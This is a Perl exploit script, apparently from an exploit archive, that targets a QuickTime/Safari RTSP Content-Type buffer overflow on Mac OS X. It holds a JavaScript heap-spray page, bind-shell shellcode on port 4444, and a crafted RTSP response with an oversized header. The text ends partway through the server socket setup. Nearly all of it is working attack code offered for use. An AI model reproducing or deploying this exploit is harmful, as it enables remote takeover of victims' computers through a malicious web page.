Safari + Quicktime
#!/usr/bin/perl
#
# quickbite.pl
#
# Safari + Quicktime <= 7.3 RTSP Content-Type overflow exploit
# for Mac OS X (Intel)
#
# Tested with OS X 10.4.
# On victim, browse to http://server:8080/
# Binds shell on port 4444.
#
# by krafty
#
# greets to sk, halvar, grugq, and all the ethnical hackers
# extra thanks to ddz for osx hackery
# sec-con greets to secwest, blackhat, hitb, hacklu, itu, xcon, syscan, poc
# sux to exploit traders - ZDI, WabiSabiLabi, and all you h0arders.
# milw0rm and packetstorm rule
# Bring back the days of technotronic and r00tshell! Freedom.
#
# Why is this exploit called "Quickbite"? Here's a dumb Apple joke:
# "What's worse than biting into an apple and finding a worm?"
# "Finding half a worm".

use Socket;
use IO::Handle;
use constant MY_HTTP_PORT => 8080;

$shellcode = "%uc031%u6850%u02ff%u5c11%ue789%u6a50%u6a01%u6a02%ub010%ucd61%u5780%u5050%u686a%ucd58%u8980%uec47%u6ab0%u80cd%u1eb0%u80cd%u5050%u5a6a%ucd58%uff80%ue44f%uf679%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5053%u3bb0%u80cd";
$buf = chr(0x11) x 6000;

# don't touch anything below this line
$html = <<ENDHTML;
<script>
var prefix = unescape("%u3166%uB0C0%uCD42%uFE80%u3CC0%u7501%uB004%uCD01%u9080");
var shellcode = unescape("$shellcode");
shellcode = prefix + shellcode;
var spray = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
do {
   spray += spray;
} while(spray.length < 0xc0000);
memory = new Array();
for(i = 0; i < 50; i++)
   memory[i] = spray + shellcode;
var url = "rtsp://" + location.host + "/x.mp3";
document.write("<EMBED SRC='" + url + "' TYPE='video/quicktime' AUTOPLAY='true' />");
</script>
ENDHTML

$rtsp_body =
"v=0\r\n" .
"o=- 16689332712 1 IN IP4 0.0.0.0\r\n" .
"s=MPEG-1 or 2 Audio\r\n" .
"i=1.mp3\r\n" .
"t=0 0\r\n" .
"a=tool:hello\r\n" .
"a=type:broadcast\r\n" .
"a=control:*\r\n" .
"a=range:npt=0-213.077\r\n" .
"a=x-qt-text-nam:MPEG-1 or 2 Audio\r\n" .
"a=x-qt-text-inf:1.mp3\r\n" .
"m=audio 0 RTP/AVP 14\r\n" .
"c=IN IP4 0.0.0.0\r\n" .
"a=control:track1\r\n";
$content_length = length($rtsp_body);
$rtsp_header =
"RTSP/1.0 200 OK\r\n" .
"CSeq: 1\r\n" .
"Date: 0x00 :P\r\n" .
"Content-Base: rtsp://0.0.0.0/x.mp3/\r\n" .
"Content-Type: $buf\r\n" .
"Content-Length: $content_length\r\n\r\n";
$rtsp = $rtsp_header . $rtsp_body;
$http_header = "HTTP/1.1 200 OK\nContent-type: text/html\n\n";
$| = 1;

my $port = MY_HTTP_PORT;
my $protocol = getprotobyname('tcp');

socket(SOCK, AF_INET, SOCK_STREAM, $protocol) or die "socket() failed: $!";
setsockopt(SOCK,SOL_SOCKET,SO_REUSEADDR,1) or die "Can't set SO_REUSEADDR: $!";
my $my_addr = sockaddr_in($port,INADDR_ANY);

 